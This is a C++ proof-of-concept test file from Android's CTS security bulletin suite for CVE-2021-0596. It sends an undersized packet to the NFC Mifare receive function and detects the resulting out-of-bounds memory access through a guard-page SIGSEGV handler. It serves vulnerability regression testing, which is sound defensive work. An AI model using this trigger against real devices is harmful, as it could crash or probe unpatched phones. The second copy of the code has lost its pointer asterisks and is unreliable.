hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp - platform/cts - Git at Google

 /*
  * Copyright (C) 2021 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at:
  *
  * http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  *
  */

 #include <unistd.h>
 #include "phNxpExtns_MifareStd.h"
 #include "../includes/common.h"
 #include "../includes/memutils.h"

 char enable_selective_overload = ENABLE_NONE;
 char *vulnPtr = nullptr;
 bool testInProgress = false;
 struct sigaction new_action, old_action;
 void sigsegv_handler(int signum, siginfo_t *info, void* context) {
     if (testInProgress && info->si_signo == SIGSEGV) {
         size_t pageSize = getpagesize();
         if (pageSize) {
             char *vulnPtrGuardPage = (char *) ((size_t) vulnPtr & PAGE_MASK) - pageSize;
             char *faultPage = (char *) ((size_t) info->si_addr & PAGE_MASK);
             if (faultPage == vulnPtrGuardPage) {
                 (*old_action.sa_sigaction)(signum, info, context);
                 return;
             }
         }
     }
     _exit(EXIT_FAILURE);
 }
 uint8_t NFC_GetNCIVersion() {
     return NCI_VERSION_2_0;
 }

 int main() {
     sigemptyset(&new_action.sa_mask);
     new_action.sa_flags = SA_SIGINFO;
     new_action.sa_sigaction = sigsegv_handler;
     sigaction(SIGSEGV, &new_action, &old_action);
     enable_selective_overload = ENABLE_MEMALIGN_CHECK;
     uint8_t *buffer = (uint8_t*) memalign(16, 16 * sizeof(uint8_t));
     enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
     FAIL_CHECK(buffer);

     vulnPtr = (char *) buffer;
     uint8_t bufferSize = 1;
     buffer[0] = 0x10;
     phNxpExtns_MfcModuleInit();
     testInProgress = true;
     Mfc_RecvPacket(buffer, bufferSize);
     testInProgress = false;
     free(buffer);
     return EXIT_SUCCESS;
 }
	/*
	* Copyright (C) 2021 The Android Open Source Project
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at:
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*
	*/

	#include <unistd.h>
	#include "phNxpExtns_MifareStd.h"
	#include "../includes/common.h"
	#include "../includes/memutils.h"

	char enable_selective_overload = ENABLE_NONE;
	char *vulnPtr = nullptr;
	bool testInProgress = false;
	struct sigaction new_action, old_action;
	void sigsegv_handler(int signum, siginfo_t info, void context) {
	if (testInProgress && info->si_signo == SIGSEGV) {
	size_t pageSize = getpagesize();
	if (pageSize) {
	char vulnPtrGuardPage = (char ) ((size_t) vulnPtr & PAGE_MASK) - pageSize;
	char faultPage = (char ) ((size_t) info->si_addr & PAGE_MASK);
	if (faultPage == vulnPtrGuardPage) {
	(*old_action.sa_sigaction)(signum, info, context);
	return;
	}
	}
	}
	_exit(EXIT_FAILURE);
	}
	uint8_t NFC_GetNCIVersion() {
	return NCI_VERSION_2_0;
	}

	int main() {
	sigemptyset(&new_action.sa_mask);
	new_action.sa_flags = SA_SIGINFO;
	new_action.sa_sigaction = sigsegv_handler;
	sigaction(SIGSEGV, &new_action, &old_action);
	enable_selective_overload = ENABLE_MEMALIGN_CHECK;
	uint8_t buffer = (uint8_t) memalign(16, 16 * sizeof(uint8_t));
	enable_selective_overload = ENABLE_FREE_CHECK \| ENABLE_REALLOC_CHECK;
	FAIL_CHECK(buffer);

	vulnPtr = (char *) buffer;
	uint8_t bufferSize = 1;
	buffer[0] = 0x10;
	phNxpExtns_MfcModuleInit();
	testInProgress = true;
	Mfc_RecvPacket(buffer, bufferSize);
	testInProgress = false;
	free(buffer);
	return EXIT_SUCCESS;
	}